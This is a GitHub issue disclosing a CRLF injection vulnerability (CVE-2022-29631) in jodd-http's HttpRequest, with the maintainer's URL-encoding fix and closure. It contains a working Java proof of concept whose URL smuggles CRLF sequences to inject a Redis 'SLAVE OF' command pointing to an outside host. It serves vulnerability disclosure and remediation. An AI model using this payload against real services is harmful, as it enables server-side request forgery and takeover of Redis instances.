Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CRLF injection vulnerability in jodd-http #9

Closed
1nhann opened this issue Apr 17, 2022 · 0 comments
Closed

CRLF injection vulnerability in jodd-http #9

1nhann opened this issue Apr 17, 2022 · 0 comments
Assignees
@igr
Labels
bug Something isn't working good first issue Good for newcomers

Comments

@1nhann
Copy link
Contributor

1nhann commented Apr 17, 2022
edited
Loading

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29631

CRLF injection vulnerability in jodd-http

CRLF injection vulnerability in jodd.http.HttpRequest#set and jodd.http.HttpRequest#send in jodd-http version 5.0.x , 5.1.x , 5.2.x , 6.0.x , 6.1.x , 6.2.x ( all versions so far ) , allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL .

Proof of concept :

        <dependency>
            <groupId>org.jodd</groupId>
            <artifactId>jodd-http</artifactId>
            <version>6.2.0</version>
        </dependency>
package top.inhann;

import jodd.http.HttpRequest;
import jodd.http.HttpResponse;

public class Test {
    public static void main(String[] args) {
        String url = "http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nSLAVE OF inhann.top:6379\r\n\r\nPOST / ";
        HttpRequest req = HttpRequest.get(url);
        HttpResponse res = req.send();
    }
}

run the poc , listen on 127.0.0.1:6379

image-20220418002705451

details :

in jodd.http.HttpRequest#set() when processing path ,this.path(destination); is called ,and it is allowed to inject \r\n in query string and path and fragment .

in jodd.http.HttpRequest#sendTo() , this.buffer(true); is called , and trying to build the http request payload . However , the path , query string , frament and othor components are just appended insecurely , which leads to the crlf injection .

suggestion :

it is recommended to urlencode the invalid characters when constructing the http request payload .
@1nhann 1nhann mentioned this issue Apr 17, 2022
Merged
@igr igr transferred this issue from oblac/jodd Apr 18, 2022
@igr igr self-assigned this Apr 18, 2022
@igr igr added bug Something isn't working good first issue Good for newcomers labels Apr 18, 2022
igr added a commit to 1nhann/jodd-http that referenced this issue Apr 18, 2022
@igr
Encode with URLCoder (closes oblac#9)
926ff66
@igr igr closed this as completed in e50f573 Apr 18, 2022
@ben-elttam ben-elttam mentioned this issue Sep 13, 2022
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@igr igr

Labels
bug Something isn't working good first issue Good for newcomers
Milestone
No milestone
Development

No branches or pull requests
2 participants
@igr @1nhann